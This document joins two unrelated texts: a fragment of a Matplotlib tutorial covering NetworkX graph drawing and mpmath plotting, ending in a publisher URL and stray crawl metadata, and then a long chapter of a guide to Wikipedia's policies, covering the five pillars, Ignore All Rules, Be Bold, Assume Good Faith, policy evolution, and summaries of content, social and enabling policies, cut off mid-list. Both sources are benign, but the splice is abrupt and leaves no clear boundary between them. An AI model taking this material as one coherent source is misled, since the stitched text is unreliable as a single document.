node_color = map(int, np.linspace(0, 255, n))
We want to give a nice coloring to our nodes, so we will use a particular color map, but before that we have to identify what colors of the color map would be assigned to each node. We do this by selecting 16 numbers evenly spaced in the 256 available colors in the color map. We now have a progression of numbers that will result in a nice fading effect in the nodes' colors.
# draw the nodes, specifying the color map and the list of color
nx.draw_networkx_nodes(G, pos,
node_color=node_color, cmap=plt.cm.hsv)
We start drawing the graph from the nodes. We pass the graph object, the position pos to draw nodes in a circular layout, the color map, and the list of colors to be assigned to the nodes.
# add the labels inside the nodes
nx.draw_networkx_labels(G, pos)
We then request to draw the labels for the nodes. They are numbers identifying the nodes plotted inside them.
# draw the edges, using alpha parameter to make them lighter
nx.draw_networkx_edges(G, pos, alpha=0.4)
Finally, we draw the edges between nodes. We also specify the alpha parameter so that they are a little lighter and don't just appear as a complicated web of lines.
# turn off axis elements
plt.axis('off')
We then remove the Matplotlib axis lines and labels. The result is as shown in the next screenshot where the nodes' colors are distributed across the whole color spectrum:
We advise you to look at the examples available on the NetworkX web site. If you like this kind of stuff, then you'll enjoy it for sure.
Mpmath
mpmath () is a mathematical library, written in pure Python for multiprecision floating-point arithmetic, which means that every calculation done using mpmath can have an arbitrarily high number of precision digits. This is extremely important for fields such as numerical simulation and analysis.
It also contains a high number of mathematical functions, constants, and a library of tools commonly needed in mathematical applications with an astonishing performance.
In conjunction with Matplotlib, mpmath provides a convenient plotting interface to display a function graphically.
It is extremely easy to plot with mpmath and Matplotlib:
In [1]: import mpmath as mp
In [2]: mp.plot(mp.sin, [-6, 6])
In this example, the mpmath plot() method takes the function to plot and the interval where to draw it.
Running this code, the following window pops up:
We can also plot multiple functions at a time and define our own functions too:
In [1]: import mpmath as mp
In [2]: mp.plot([mp.sqrt, lambda x: -0.1*x**3 + x-0.5], [-3, 3])
On executing the preceding code snippet, we get the following screenshot where we have plotted the square root (in blue, upper part) and the function we defined (in red, lower part)0:
To plot more functions, simply provide a list of them to plot(). To define a new function, we use a lambda expression.
Note how the square root plot is done in full lines for positive values of X, while it's dotted in the negative part. This is because for X negatives, the result is a complex number: mpmath represents the real part with dashes and the imaginary part with dots.
Summary
In this article, we have seen several examples of real world Matplotlib usage, including:
- How to plot data read from a database
- How to plot data extracted from a parsed Wikipedia article
- How to plot data from parsing an Apache log file
- How to plot data from a CSV file
- How to plot extrapolated data using a curve fitting polynomial
- How to plot using third-party tools such as NetworkX and mpmath
We hope these practical examples have increased your interest in exploring Matplotlib, if you haven't already explored it!
If you have read this article you may be interested to view :
|
https://www.packtpub.com/books/content/plotting-data-using-matplotlib-part-2
|
CC-MAIN-2017-34
|
refinedweb
| 3,980
| 61.06
|
ive been working on the binary to decimal converter program. not having a fun time with it!!
this is what i have:
#include <stdio.h> #include <stdlib.h> #include <math.h> int main ( void ){ /* variables */ int decimalValue = 0; int counter = 0; int nextDigit = 0; char binary = 0; /* begin */ printf("Please enter a binary string of 1's and 0's: "); scanf("%c",&binary); /* get 1st digit of binary */ nextDigit = binary % 10; while( binary ) { if( nextDigit != 0 ) { decimalValue += (int) pow(2,counter); } counter++; /* get next digit of binary */ binary = binary / 10; nextDigit = binary % 10; } printf("The Value is %i in decimal\n",decimalValue); system ("PAUSE"); return 0; } /* main */
it likes to return 3 as an answer no matter what. i cant figure out where its going wrong :(
|
https://www.daniweb.com/programming/software-development/threads/149194/need-help-with-code-returning-wrong-values-and-i-cant-figure-out-why
|
CC-MAIN-2019-04
|
refinedweb
| 126
| 57.16
|
Uri.EscapeComponent | escapeComponent method
Converts a Uniform Resource Identifier (URI) string to its escaped representation.
Syntax
Parameters
- toEscape
Type: String [JavaScript] | Platform::String [C++]
The string to convert.
Return value
Type: String [JavaScript] | Platform::String [C++]
The escaped representation of toEscape.
Remarks
Use EscapeComponent as a utility to escape any URI component that requires escaping in order to construct a valid Uri object. For example, if your app is using a user-provided string and adding it to a query that is sent to a service, you may need to escape that string in the URI because the string might contain characters that are invalid in a URI. This includes characters as simple as spaces; even input that seems to be pure ASCII may still need encoding to be valid as a component of a URI.
You can append the string you get from EscapeComponent onto other strings before calling the Uri(String) constructor. You'll want to encode each component separately, because you do not want to escape the characters that are significant to how the Uri(String) constructor parses the string into components, such as the "/" between host and path or the "?" between path and query.
EscapeComponent might also be useful for other scenarios where a URI-escaped string is needed for an HTTP request scenario, such as using APIs in the Windows.Web.Http namespace.
Requirements (device family)
Requirements (operating system)
See also
|
https://msdn.microsoft.com/library/windows/apps/windows.foundation.uri.escapecomponent.aspx
|
CC-MAIN-2015-22
|
refinedweb
| 236
| 50.67
|
CodePlexProject Hosting for Open Source Software
Hi All,
I'm trying to create a projection with a custom content part I have created through code, however one of the properties does not appear to be available - which is just a string prop.
public class SummaryPart : ContentPart<SummaryPartRecord>
{
[Required]
public string Summary {
get { return Record.Summary; }
set { Record.Summary = value; }
}
}
After I initially create the SummaryPart via Migrations, I add a Media Picker field, which is available to add for the Projection. Any ideas why I cant use Summary property in the Projection?
Many thanks in advance,
Peter
You'll need to add a binding for the property. Check the bindings tab inside of the query admin.
Thanks so much Brandon - just what I was looking for! Thanks again
Are you sure you want to delete this post? You will not be able to recover it later.
Are you sure you want to delete this thread? You will not be able to recover it later.
|
http://orchard.codeplex.com/discussions/428206
|
CC-MAIN-2015-14
|
refinedweb
| 164
| 66.44
|
How Wikipedia Works/Chapter 13
Wikipedia's official policies apply to everyone—if you're editing Wikipedia at all, rather than just reading it, then you have to accept that site policies apply to you too. Policies determine what types of articles are acceptable, what styles of writing are appropriate, and generally how editors should behave.
These policies are not dictated from on high. Like Wikipedia's articles, they've been developed collaboratively by community members. In principle, anyone on the site can write and edit policy, and this chapter will brief you about how to participate. It will provide background on Wikipedia tradition and customs, which will help you understand the terms in which a debate is usually posed and give you a feel for how change is actually implemented.
This chapter will also give you a working knowledge of the existing policies and some of the core principles behind them.
All aspects of policy are explicitly documented on project pages. These pages, just like Wikipedia articles, are editable and supported by discussion pages on which community members work out details and changes.
Contents
- 1 The spirit of wikipedia
- 2 What Is Policy?
- 3 Summary
- 4 Letter of the Law
The spirit of wikipedia[edit]
You won’t master Wikipedia’s policies just by poring over policy pages. People new to the site need an introduction to Wikipedia’s culture, not just a rule book. Much of what happens on Wikipedia is not strictly governed by written rules. For example, Wikipedia is a working environment in which a huge encyclo pedia is written by a diverse group. This isn’t official policy. But this is why serious Wikipedians are on the site. Wikipedia certainly has policies against disrupting the site, but defining disruption is like drawing a line between distracting someone at the desk next to you for a good reason and actually preventing him or her from working. Don’t expect disruption to be completely spelled out, any more than in real life. In that way, common sense is the first aspect of policy to master. You can’t expect policies to be summed up completely by any one slogan, but this section will cover what many contributors see as Wikipedia’s central principles.
The Five Pillars[edit]
We’ll start with the five pillars of Wikipedia, a harmonious summary of the principles that guide the site.
- Wikipedia is an encyclopedia (not anything else).
- Wikipedia has a neutral point of view (the NPOV policy).
- Wikipedia is free content that anyone may edit. (All Wikipedia content is freely licensed and free of charge, and content is freely editable.)
- Wikipedia has a code of conduct. (Editors should behave civilly toward Wikipedia has a code of conduct. (Editors should behave civilly toward each other.)
- Wikipedia does not have firm rules. (The editing community can change the rules.)
The five pillars summarize Wikipedia as a website, a mission, and a community. We don’t need to say more about the first three points since they were covered in Chapters 1, 2, and 5. In this chapter, we’ll focus on detailing the fourth and fifth pillars and associated behavior policies. In the next two sections, we’ll talk about three philosophies—one policy and two guidelines—that are at the core of how Wikipedia operates.
Ignore All Rules and Be Bold[edit]
Wikipedia has a degree of organization, but no one could accuse it of precision. The site organizes itself and is not managed by a top-down structure. Some of the consequences may seem contrarian, lax, or possibly a little rude. The principle of no firm rules can seem contrary but is deeply rooted in Wikipedia culture. The fifth pillar leads to a basic policy: Ignore All Rules (IAR).
The policy reads, in its entirety, If the rules prevent you from improving or maintaining Wikipedia, ignore them.
This policy appears at Wikipedia:Ignore all rules (shortcut WP:IAR).
Policies and guidelines, in other words, exist to create the best site possible. They are not ends in themselves; they can be changed, and they may be ignored when common sense dictates. Wikipedia is not, however, an anarchy (see WP:ANARCHY), so most rules are not under threat of being disregarded; Ignore all rules simply serves to release pressure when needed. Rules should be ignored when necessary or for a good reason, and most of the rules, or policies and guidelines, help Wikipedia function more smoothly. Ignore All Rules has been around from the beginning of Wikipedia—it expresses a core value of the project. The earliest version of the policy expresses the intended sentiment well: If rules make you nervous and depressed, and not desirous of participating in the Wiki, then ignore them and go about your business.
Closely related is the guideline (and site philosophy): Be Bold. Be Bold exhorts contributors to be bold in editing pages! This philosophy is fundamental to Wikipedia. With no top-down structure, work gets done, not because it was assigned as a task but because someone decided to be bold and do it. Although Be Bold is not an excuse to contradict standard policies and procedures, don’t be shy about improving the site. In the spirit of being bold, newcomers shouldn’t worry about whether their ideas conform completely to custom. Wikipedia has no set demarcations of who can work on what. But newcomers should be polite in presenting their ideas, another core principle. Be bold!—but be civil, too. Edits can be reverted; uncivil exchanges with other editors cannot be unsaid.
This whole attitude of no demarcations is, in turn, related to the idea of so fix it, which, though not a policy or guideline, is a core part of wiki culture. Almost everything is freely editable—and thus fixable—by anyone, and volunteers do virtually all the work. The response to complaining is likely to be “so fix it.” This is enshrined in a template that can be used to answer complaints about content or other problems. The {{sofixit}} template starts off,
Thank you for your suggestion. When you feel an article needs improvement, please feel free to make those changes.
This concept helps explain a Wikipedian lightbulb joke:
- Q: How many Wikipedians does it take to change a lightbulb?
- A: Zero. Just tag the light bulb as {{unscrewed}} and let someone else worry
about it.
A little cynical perhaps, but the point is true about voluntary projects. You can find more of the same at User:Bibliomaniac15/How many Wikipedians does it take to screw in a lightbulb?. This doesn’t mean constructive criticism isn’t welcomed. The point is that wiki sites are designed to allow critics to intervene: If you feel sidelined about making some remarks, those “sidelines” are in your imagination; they aren’t coming from Wikipedia. The essay Wikipedia:BOLD, revert, discuss cycle (shortcut WP:BRD) makes some interesting points. The essay is couched in the language of dispute resolution and concedes that being bold may be provocative. Someone interested and confident enough can make a sweeping change that may be reverted. This change may still be helpful, though; it may break a logjam or a consensus that has become too entrenched. Be opportunist about new changes: You don’t have to revert to a previous, safer version.
Don’t Stuff Beans up Your Nose A modern fable about contrarianism is popular on Wikipedia: the small boy who wouldn’t have thought of putting beans up his nose until it was forbidden. Online, contrarians often claim to be the loyal opposition to groupthink(discussed further in Chapter 14). See WP:BEANS and the summary, If they haven’t done it already, don’t tell a user not to do a specific stupid thing. It may encourage them to do it. In other words, a contrarian can easily become counter-suggestible, so simply having more and more rules is worse than light regulation that makes good sense to almost everyone.
Assume Good Faith[edit]
The fourth pillar deals with conduct on the site. Inevitably, Wikipedia has some problem users, but most users don’t cause problems at all. Assume Good Faith (often abbreviated as AGF) is a key part of understanding how to deal with others on the site. Assume Good Faith was introduced in Chapter 12 as an aspiration. But Assume Good Faith is also a basic guideline because it helps preserve Wikipedia’s good working environment.
Wikipedia’s culture is to assume that mistakes are generally good-faith errors. The Internet has become a place where people are often assumed to bring their own agenda to any discussion. Wikipedia cannot change this assumption directly, but Assume Good Faith helps reduce the tendency to suspect others’ motives. In other words, leave your baggage at the door!
Assuming good faith is a choice you make that reduces friction. Editors should assume all other editors are sincerely trying to improve the project. This means treating all other editors’ contributions in a professional, fair-minded fashion. Someone who ignores a formatting guideline may simply be making an honest mistake. Someone infringing on a policy may be unaware ofit. Bias may be unintentional. Discuss your differences with other editors on talk pages before jumping to conclusions about their motives.
This is not to say that Wikipedia doesn’t have true trolls, vandals, and other scalawags editing articles. Dispute resolution (covered in depth in Chapter 14) provides processes for dealing with a difficult editor when the evidence shows that he or she is not acting in good faith. By and large, however, most people edit Wikipedia because they want to contribute and help. Believing that is best—until you have firm evidence otherwise. Most likely, this is how you would want to be treated in an unfamiliar place; dispute resolution is not for vague suspicions.
- Further Reading
- Explanations of the five pillars of Wikipedia
- The guideline to assume good faith
- The guideline to be bold when editing pages
- Ignore all rules, the first rule on Wikipedia and now a policy
What Is Policy?[edit]
Policy on Wikipedia refers to the large collection of documents that have been developed over time by the editing community. An important working distinction is made between official policy and guidelines. Similar to the familiar distinction between what is mandatory (regulations you are required to follow) and what is only advisory, policies are meant to be followed by all contributors in their work on the site, whereas guidelines are like a manual of standard practices. Policies and guidelines are sometimes first developed in essays, which are position papers posted on the site by an individual editor in his or her user space or the Wikipedia namespace for others to work on; though many essays are quite popular and are often cited in discussions, they typically do not have the same level of consensus as policies and guidelines and are not mandatory.
Ignoring official policy or guidelines doesn't benefit you. Policies have a clear status and generally represent more fundamental principles that have broad consensus among editors. Guidelines should at least have wide consensus, though, and reflect common sense or good practice as applied to the production of Wikipedia. A guideline may only be advice about some stylistic detail, but the advice will generally be good.
Official Policy[edit]
Official policy is a category. See. Simply said, project pages belonging to this category are official policy pages. At the time of this writing, Wikipedia has 46 policy pages in this category.
Wikipedia has no body that can make a policy official; this declaration is based on consensus. A few policies have been adopted at the Wikimedia Foundation level, which are non-negotiable at the project level, but these deal primarily with the content license and privacy practices (see Chapter 17, The Foundation and Project Coordination for the Wikimedia Foundation's policies). Everyday matters of policy on the English-language Wikipedia are not really affected by the Foundation.
Most policies are, therefore, a matter of consensus within the editing community. Here are two significant comments from the Official policy category page:
There are only a few key policies that might be regarded as "official"—that is, considered by the founders and the vast majority of contributors as being particularly important to the running of Wikipedia. […] They have either withstood the test of time or have been adopted by consensus or acclamation.
and
Very often, there is no "bright line" distinction between proposed policy, guidelines, and "actual" policy. Policy at Wikipedia is a matter of consensus, tradition, and practice. While the principles of the policies in this category are mostly well established, the details are often still evolving, so not everything in these pages represent hard and fast rules.
Though this is true, over time policy becomes firmer and less subject to change.
Policies and Guidelines[edit]
Policies and guidelines on Wikipedia have a wide scope: They include article style issues, contributor behavior standards, and content inclusion rules. All policies and guidelines exist on pages in the Wikipedia namespace. The policy pages found at are by no means all equally important. Later in this chapter, we'll analyze these pages to give you a concise, readable introduction.
Policy documents typically have much context and history behind their creation and wording. Both the spirit and the letter of the policy are important; editors should comply with the principles expressed. The most important point will be the expression of some reasonable expectation of how editors should act under normal conditions. The drafting of the policy reflects this: The main thrust of a policy is to convey one idea, and this idea should make good sense to someone familiar with the site. For instance, the ordinary editor doesn't need to read the fine print on the policy page outlining the value of consensus. But administrators making decisions based on discussions will require more information about what consensus means.
Principles of policy are different from specific processes or procedures but are often interrelated. Take, for example, the Article Deletion policy. The policy refers to the various deletion processes; it doesn't discuss the details of how the specific processes work. Rather, it authorizes them. 2.3. How Policies Are Created and Developed
Wikipedia does not have a special area just for drafting legislation. The starting point for a new policy may be a new project page in the Wikipedia namespace or possibly an essay that makes sense to other editors and begins to be referenced in discussions. Policies and guidelines, like other content on Wikipedia, are then developed over time by interested editors through a consensus-based process. Policies and guidelines are typically altered to reflect changing practice on the site or to solve a problem that has arisen. If consensus for a new proposed policy can't be reached, the proposal will be dropped.
If a change to policy sticks, in the sense that it has been on the policy page for some weeks without being removed and discussion seems to support the change, the new or amended policy has been widely accepted. The expectation is then that all editors will begin to follow the new policy when someone points it out. Keeping informed about changing policies and guidelines is a real issue for editors; beyond the core content and behavioral policies, many editors may not know about all the policies and guidelines. This is where Assume Good Faith applies: If User:Alice sees that User:Bob isn't following a new guideline, Alice should let Bob know that the guideline changed last month rather than scold him.
Policy and guideline creation, in practice, starts and ends in the Wikipedia namespace. The fact that policy pages are editable is one of the radical, counterintuitive Wikipedia concepts. Minor changes to policy formulations can occur at any time if the community agrees the changes are needed; major changes and new policies are also slowly developed to meet new needs and changing circumstances.
Of course, the practical process for changing policy is not so simple as just making an edit. Policies can and do change; however, the process is often very slow. On pages in the Wikipedia Talk namespace discussions are always ongoing, proposing and criticizing changes to policy. Most policy page changes are reverted if they are substantive and have not been discussed previously on the attached talk page and perhaps on other community forums. Always seek a high level of consensus before making a change to a key policy page. Given a policy's role in regulating the site, more discussion is required than elsewhere. For basic guidance on participating in policymaking, go to Wikipedia:How to contribute to Wikipedia guidance.
For example, on May 11, 2007, a new section was added to Wikipedia:Disambiguation, the guideline regulating 70,000 disambiguation pages on Wikipedia. The material had already been discussed at Wikipedia talk:Manual of Style (disambiguation pages); the guideline called for adding a new section, so-called Set index articles, to recognized page types. In this somewhat notorious area (the ambiguities of ambiguity, you could say), the following case was made:
A set index article describes a single set of concepts. For example, Dodge Charger describes a set of cars, List of peaks named Signal Mountain describes a set of mountain peaks, or USS Enterprise describes a set of ships. A set index article is both for information and for navigation: just like a normal list article, it can have metadata and extra information about each entry. A set index article can be entertaining and informative by itself, can help editors find redlinks to create articles on notable entries, and finally can also help readers navigate between articles that have similar names. (From)
So an exception to the general guideline was made for a small group of articles. This incremental change by User:Hike395 was accepted, replacing what previously only applied to lists of ships with the same name. You can reasonably assume that the amendment, by being vetted through discussion, has been accepted through consensus by the editors interested in disambiguation pages; for other contributors not involved in the discussion who may happen to work in this area, the guideline now provides more detailed information that they should reasonably follow in most cases. If a future contributor comes along and has a serious problem with this or any other part of the guideline, the contributor may state his or her case on the guideline's talk page, beginning the cycle again.
This example is a relatively simple case, affecting a particular stylistic guideline for a certain type of article. On the other hand, proposed changes to the Notability guideline or Verifiability policy—policies that affect every Wikipedia article and indeed, the nature of the site itself—should be debated for weeks or months on the policy's talk page and on other forums. Changes to these policies may be difficult to make unless very compelling reasons are given. This difficulty does not necessarily reflect the proposal's validity, but simply how difficult getting consensus is among the very wide group of editors—potentially, the entire community—who may be interested in site-wide policy changes.
Essays written by individual Wikipedians are not at all official, but they may eventually serve as the basis for policies or guidelines. You can find hundreds of essays at; anyone, naturally, may add to these. Essays are policy development as pamphlet writing; you should expect to present your ideas first before proposing a big policy change. Essays are also a useful platform for expressing an opinion on applying policies. Some of the most-cited essays, however, are humorous expositions on basic Wikipedia ideals and ways to behave; Wikipedia:No climbing the Reichstag dressed as Spider-Man is an example, pointing out that you shouldn't take debates so seriously you go to extreme measures to make a fuss about them.
Many proposals for future policy are made and then abandoned due to lack of interest or consensus. You can read many of these at, with the template
applied; for example, Wikipedia:Changing policies and guidelines was an attempt to clarify that certain policy changes require consensus before being made; somewhat ironically, this policy didn't make the cut. You can get some good insights into the shaping of policy from reading rejected proposals.
Summary[edit]
Wikipedia's policies have evolved from being simple principles to being a large group of pages. You can probably count the ones on the site that matter most in daily life on the fingers of two hands. Understanding the basic point of a given policy or guideline, as it affects you, and in combination with Wikipedia's customs, is more important than worrying about the details or how others should comply. Bring policy into arguments only when you have to, and if you become involved in developing or modifying policy pages, make sure you can take the lead in getting consensus among the community.
How Policies Evolve[edit]
If you want to change something about how Wikipedia works, you'll have to make an effort and accept that it will only happen piecemeal. Preparing for policy changes matters greatly. You can't always expect to change a guideline with which you disagree on some minor point of style or format and then proceed directly to edit the whole site to change that point wherever you can find it—this behavior is rightly viewed as disruptive. If you encounter some resistance, you have to respect the objections people raise. If they didn't know the guideline was being changed, they weren't part of the consensus you claimed. If too many people disagree with some aspect of policy, the policy will likely be modified.
For example, a controversial change to the Spoiler warnings guideline caused a furor in May 2007. The template
had traditionally been used on the site in a Plot section of a film or book article, as a warning to those unfamiliar with the work being discussed that the text they were about to read would give the story away. These warnings had been an accepted feature of Wikipedia for years. But some pent-up feelings against them existed: Some argued that they interfered with the encyclopedia function, or in other words, serious reference works don't need spoiler warnings. The wide use of spoiler warnings concealed the fact that their presence in articles annoyed many editors.
The page Wikipedia:Spoiler was edited: What it currently says (as of April 2008) includes this new text:
Spoilers on the Internet are sometimes preceded by a spoiler warning. In Wikipedia, however, it is generally expected that the subjects of our articles will be covered in detail. Therefore, Wikipedia carries no spoiler warnings except for the Content disclaimer.
Once a tipping point had been reached, with those against spoiler warnings gaining control of that guideline page, over 45,000 spoiler warnings were rapidly deleted from Wikipedia. This change caused tension and many back and forth arguments at the time. Though still controversial, the change has (so far) stuck.
How to Interpret Policies and Guidelines[edit]
Don't be legalistic about reading policy pages—a practice known unfavorably as wikilawyering. Policies are not drafted like legal documents, so don't push their meaning beyond the basic point or intention. The correct approach is usually this: Read the policy first to see what is required and respect the intent and spirit of the policy.
Assuming that policies can settle arguments is only human. Policies are actually there to help Wikipedia work, defining more closely what should be done and preserving a good atmosphere. They are not primarily tools for resolving disputes over content. Although such disputes may well come down to a discussion of policies and how they should be applied, be reasonable, collegiate, and open-minded in bringing policy into edit wars. A narrow view of a policy or guideline is not likely to resolve matters.
We Got Here from Where?
Sometimes you need to understand how policies evolved to see what they are really saying and what weight you should give them. Discussions leading up to the development of policies, like all discussions, are kept on the site, though reviewing the archives is not always an easy or clear process. Policies can appear path-dependent, and if you suspect a policy has been widened over time, you might be right. This is also a part of policy evolution.
For instance, the No Original Research (NOR) policy, for example, was first formulated to keep original theories in physics from Wikipedia. Its application has since expanded to include other topics. On the wiki-en mailing list (6 December 2004), Jimmy Wales wrote:
Some who completely understand why Wikipedia ought not create novel theories of physics by citing the results of experiments and so on and synthesizing them into something new, may fail to see how the same thing applies to history.
By now the NOR policy very much applies to history: Wikipedia wants neither theories about how Einstein had it all wrong about relativity, nor historical theories that have no serious scholarly support, for example, about the Ten Lost Tribes, if these theories are presented as original research and argument.
- Further Reading
- The policy on policies and guidelines; a good overview of policies, guidelines, and proposals
- Advice on changing policies
- The category of proposed new policies
- The category of rejected policies
- Basic rules to work by
Letter of the Law[edit]
To understand policy details, you first have to find the relevant pages, next get the basic gist of a policy, and only then look at the more specific points. The precise wording of a policy may well change over time while the general idea remains the same.
For many policies, Wikipedia has handy nutshell summaries, which we've imported (current as of August 2007). For others, we've written our own summary. The uppercase abbreviated title is the page shortcut, less WP; so, for example, you can find Attack Page (ATP) at WP:ATP.
List of Policies[edit]
Policies fall into a few classes. Some deal with article content, and others deal with editor interactions. We've broken them down into four types for convenience.
Content Policies[edit]
Content policies deal with article content, both what articles should be and what you can do with them.
- Attack Page (ATP)
Aggressive, hostile, biased articles will be summarily deleted.
- Biographies of Living Persons (BLP)
From Wikipedia: Wikipedia articles can affect real people's lives. This gives us an ethical and legal responsibility. Biographical material must be written with the greatest care and attention to verifiability, neutrality, and avoiding original research, particularly if it is contentious.
Wikipedia operates under a copyleft approach to its content, with the copyright to contributions remaining with those who created them. (See Chapter 2, The World Gets a Free Encyclopedia for more on copyleft.)
Wikipedia actively removes copyrighted material.
- Editing Policy (EP)
From Wikipedia: Improve pages wherever you can, and do not worry about leaving them imperfect.
- Libel (LIBEL)
Wikipedia removes any defamatory material it finds, responds to email requests to do so, and regards editors adding libelous material as being responsible for that content.
- Naming Conventions (NAME)
From Wikipedia: Generally, article naming should prefer what the majority of English speakers would most easily recognize, with a reasonable minimum of ambiguity, while at the same time making linking to those articles easy and second nature.
- Neutral Point of View (NPOV), Neutral Point of View/FAQ (NPOVFAQ)
From Wikipedia: All Wikipedia articles and other encyclopedic content must be written from a neutral point of view, representing views fairly, proportionately, and without bias.
- Non-Free Content Criteria (NFCC)
This policy attempts to delimit the use of non-free content (such as fair-use images) on Wikipedia.
- No Original Research (NOR)
From Wikipedia: Wikipedia is not a publisher of original thought. Articles should only contain verifiable content from reliable sources without further analysis. Content should not be synthesized to advance a position.
- Ownership of Articles (OWN)
From Wikipedia: If you create or edit an article, know that others will edit it, and within reason, you should not prevent them from doing so.
- Reusing Wikipedia Content (REUSE)
Wikipedia material may be re-used by anyone, within the terms of the GFDL.
- Verifiability (V)
From Wikipedia: Material that is challenged or likely to be challenged, and all quotations, must be attributed to a reliable, published source.
Social Policies[edit]
Social policies deal with how editors should behave and interact with one another on the site.
- Civility (CIVIL)
From Wikipedia: Participate in a respectful and civil way. Do not ignore the positions and conclusions of others. Try to discourage others from being uncivil, and be careful to avoid offending people unintentionally.
- Edit War (EW)
From Wikipedia: If someone challenges your edits, discuss it with them and seek a compromise, or seek dispute resolution. Don't just fight over competing views and versions.
- No Legal Threats (LEGAL)
From Wikipedia: Do not make threats or claims of legal action against users or Wikipedia itself on Wikipedia. If you have a dispute with the Community or its members, use dispute resolution. A polite report of a legal problem such as defamation or copyright infringement is not threatening and will be acted on quickly. If you do choose to take legal action, please refrain from editing until it is resolved and note that your user account may be blocked.
- No Personal Attacks (NPA)
From Wikipedia: Comment on content, not on the contributor.
- Dispute Resolution (DR)
Try to avoid arguments; if in a dispute, talk it over calmly and consider your words first.
- Sock Puppetry (SOCK)
From Wikipedia: Do not use multiple accounts to create the illusion of greater support for an issue, to mislead others, or to circumvent a block. Do not ask your friends to create accounts to support you or anyone else.
- Three-Revert Rule (3RR)
From Wikipedia: Edit warring is harmful. Wikipedians who revert a page in whole or in part more than three times in 24 hours, except in certain special circumstances, are likely to be blocked from editing.
- Vandalism (VANDAL)
From Wikipedia: Intentionally making repeated non-constructive edits to Wikipedia will result in a block or permanent ban.
- Wheel War (WHEEL)
Applies only to administrators. Repeatedly reversing actions of other administrators is considered harmful.
Enabling Policies[edit]
These are basic documents on which various processes and administrator actions rely. For example, under the Username policy (UN), accounts with unsuitable usernames will be blocked. These policies are often intended for specific situations.
- Arbitration Policy (AP)
See Chapter 14, Disputes, Blocks, and Bans for details on Arbitration, which is a high-level dispute resolution process.
- Appealing a Block (APPEAL)
This policy mentions all the correct appeal routes available to a user blocked by an administrator.
- Banning Policy (BAN)
This policy explains why and how editors are excluded from the site.
- Blocking Policy (BP), Appealing a Block (APB)
From Wikipedia: Users may be blocked from editing by an administrator to protect Wikipedia and its editors from harm.
- Bot Policy (BOT)
This is a procedural guide to automated editing.
- Category Deletion Policy (CDP)
This is a policy for the named process.
- Criteria for Speedy Deletion (CSD)
This is a very detailed list of the criteria used by administrators to delete articles quickly.
- Deletion Policy (DEL)
From Wikipedia: Deletion and undeletion are performed by administrators based on policy and guidelines, not personal likes and dislikes. There are four processes for deleting items and one post-deletion review process. Pages that can be improved should be edited or tagged, not nominated for deletion.
- Image Use Policy (IUP)
From Wikipedia: Be very careful when uploading copyrighted images, fully describe images' sources and copyright details on their description pages, and try to make images as useful and reusable as possible.
- Open Proxies (PROXY)
Administrators may block open or anonymizing proxy servers that allow you to edit while hiding your IP address.
- Office Actions (OFFICE)
From Wikipedia: Sometimes the Wikimedia Foundation may have to delete, protect, or blank a page without going through the normal site/community process(es) to do so. These edits are temporary measures to prevent legal trouble or personal harm and should not be undone by any user.
- Open Ticket Request System (OTRS)
This document describes the operation of the Open Ticket Request System, which handles email complaints to Wikipedia.
- Oversight (OVER)
This is actually a Foundation-level policy. It describes the Oversight system for removing edits from page histories, with scope to deal with personal information, defamation, and copyright only.
- Proposed Deletion (PROD)
From Wikipedia: As a shortcut around AfD [i.e., Articles for Deletion] for uncontroversial deletions; an article can be proposed for deletion, though once only. If no one contests the proposal within five days, the article may be deleted by an administrator.
- Protection Policy (PROT)
This policy covers administrator use of the power to protect pages by locking editing.
- Username Policy (UN)
From Wikipedia: When choosing an account name, be careful to avoid names which may be offensive, confusing, or promotional. You are encouraged to use only one account.
General Policies[edit]
These core policies apply across the site, to both content and social situations.
- Consensus (CON)
From Wikipedia: Consensus is Wikipedia's fundamental model for editorial decision-making. Policies and guidelines document communal consensus rather than creating it.
- GNU Free Documentation License (GFDL)
This is the license under which Wikipedia is released. The general outline is covered in Chapter 2, The World Gets a Free Encyclopedia, but material on secondary and invariant sections and cover texts, although not so relevant to Wikipedia, may have an effect on imported GFDL material.
- Ignore All Rules (IAR)
Wikipedia is not a rule-bound place, and the rules should serve the mission. Occasionally, editors can operate outside policy, if they are acting within common sense.
- What Wikipedia Is Not (NOT)
This policy defines Wikipedia's mission by describing what it isn't; this is a key reference.
It Used to Be So Much Simpler The earliest version of Wikipedia:Policies and guidelines dates back to April 17, 2002 (though an earlier version, just called Wikipedia policy, dates back to 2001; the very earliest history was lost due to technical glitches). Much of the original content is now considered part of the style guide and doesn't relate to policy as such. Wikipedia:Most common Wikipedia faux pas is still available and useful to know about; it is now under the title Wikipedia:Avoiding common mistakes (shortcut WP:ACM). Wikipedia:Always leave something undone was renamed Wikipedia:Make omissions explicit, but this is no longer policy. Wikipedia:Look for an existing article before you start one was emphasized earlier in the book; this policy was merged into Wikipedia:How to start a page about a year later. Wikipedia:Contribute what you know or are willing to learn more about has the nostalgic feel of older wikis; this page also didn't turn into policy. If depressed by the comparison, try Wikipedia:What Wikipedia is not/Outtakes.
List of Guidelines[edit]
This is a selective list of some guidelines we consider particularly important. There are over a hundred guidelines total, many of which are part of the Manual of Style (you can find a complete collection of guidelines at). Summaries for interesting guidelines tend to be significantly longer than for official policies. They are often saying something important but more diffuse. They are certainly more rewarding to read casually.
Assume Good Faith (AGF)
From Wikipedia: Unless there is strong evidence to the contrary, assume that people who work on the project are trying to help it, not hurt it. If criticism is needed, discuss editors' actions, but it is not ever necessary nor productive to accuse others of harmful motives.
Attribution
This policy is not current, but it is of particular interest as an attempt to unify NOR and V (ATT). From Wikipedia: All material in Wikipedia must be attributable to a reliable, published source.
Autobiography (AUTO)
From Wikipedia: Avoid writing or editing an article about yourself, other than to correct unambiguous errors of fact.
Be Bold (BOLD)
From Wikipedia: If you see something that can be improved, do not hesitate to do so yourself.
Conflict of Interest (COI)
From Wikipedia: When an editor disregards the aims of Wikipedia to advance outside interests, they have a conflict of interest. Conflict of interest editing is strongly discouraged, but editors with a potential conflict of interest may edit with appropriate care and discussion.
Do Not Disrupt Wikipedia to Illustrate a Point (POINT)
From Wikipedia: If you think you have a valid point, causing disruption is probably the least effective way of presenting that point'and it may get you blocked.
This applies particularly to those with a grievance or burning issue to raise. Attention-seeking tactics that have a negative impact on others are not acceptable as a campaigning measure. Such disruption is generally considered actionable and can lead to a ban.
Etiquette (EQ)
This is a general guide to expected etiquette on the site.
Harassment (HARASS)
From Wikipedia: Do not stop other editors from enjoying Wikipedia by making threats, nitpicking good-faith edits to different articles, repeated personal attacks, or posting personal information.
Manual of Style (MOS)
This is the Manual of Style for articles, with all its many subpages that detail specific style guide issues.
Notability (N)
